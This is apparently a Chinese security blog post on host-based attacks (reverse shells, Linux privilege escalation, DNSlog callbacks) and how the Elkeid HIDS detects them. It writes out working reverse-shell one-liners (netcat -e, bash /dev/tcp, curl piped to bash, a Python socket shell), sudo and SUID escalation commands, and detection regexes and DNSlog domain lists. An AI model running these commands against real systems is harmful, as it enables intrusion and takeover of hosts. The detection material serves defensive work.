---

概述

本文更新通過在主機(jī)（不含容器）上直接執(zhí)行命令或啟動(dòng)進(jìn)程來攻擊的場(chǎng)景。檢測(cè)方面以字節(jié)跳動(dòng)的開源HIDS elkeid舉例。每種檢測(cè)僅舉一個(gè)例子，其余的給出示例payload。

反彈shell

原理

控制端監(jiān)聽在某TCP/UDP端口，被控端發(fā)起請(qǐng)求到該端口，并將其命令行的輸入輸出轉(zhuǎn)到控制端

nc

nc 遠(yuǎn)程ip 端口 -e /bin/bash

Elkeid規(guī)則如下：

(?:\bnc(?:\s+-+\w+\s*[^\x3B\x7C]*\s+-\w*e\w*\b|\s+-\w*e\w*|\s+[\d\.\s]+\s+-\w*e\w*)|\bnc.openbsd(?:\s+-+\w+\s*[^\x3B\x7C]*\s+-\w*e\w*\b|\s+-\w*e\w*|\s+[\d\.\s]+\s+-\w*e\w*)|\bnc.traditional(?:\s+-+\w+\s*[^\x3B\x7C]*\s+-\w*e\w*\b|\s+-\w*e\w*|\s+[\d\.\s]+\s+-\w*e\w*)|\bnc.linux(?:\s+-+\w+\s*[^\x3B\x7C]*\s+-\w*e\w*\b|\s+-\w*e\w*|\s+[\d\.\s]+\s+-\w*e\w*)|\bnetcat(?:\s+-+\w+\s*[^\x3B\x7C]*\s+-\w*e\w*\b|\s+-\w*e\w*|\s+[\d\.\s]+\s+-\w*e\w*))

/dev/xxx反彈shell

指的是通過/dev/tcp或/dev/udp的方式建立連接反彈shell，舉例：

bash -i >& /dev/tcp/遠(yuǎn)程ip/端口 0>&1

下載不落地反彈Shell

指的是下載后通過管道等方式執(zhí)行，不落地，舉例：

curl/wget http://xxx.sh | bash

各種語言反彈shell

以Python為例：

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("遠(yuǎn)程ip",端口));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

linux提權(quán)

sudo

原理：臨時(shí)賦予root權(quán)限運(yùn)行某個(gè)程序

sudo less file_path

!bash

suid提權(quán)

chmod u+s filename 設(shè)置SUID位
chmod u-s filename 去掉SUID設(shè)置

收集具有suid的文件

find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;

mysql提權(quán)

• udf提權(quán)
• 寫入webshell提權(quán)
• mof提權(quán)

Dnslog

Elkeid規(guī)則如下：

.awvsscan119.autoverify.cn|.cybertunnel.run|.dnstunnel.run|.s0x.cn|.dns.1433.eu.org|.logplog.eu.org|.ns.dns3.cf|.vuleye.pw|.ceye.io|.exeye.io|.vcap.me|.xip.name|.xip.io|.sslip.io|.nip.io|.burpcollaborator.net|.tu4.org|.2xss.cc|.bxss.me|.godns.vip|.0kee.#|.r87.me|.ngrok.io|.xn--9tr.com|.pipedream.net|.vxtrans.com|.vxtrans.link|.hopto.org|.zapto.org|.sytes.net|.ddns.net

參考

linux提權(quán)
反彈Shell原理及檢測(cè)技術(shù)研究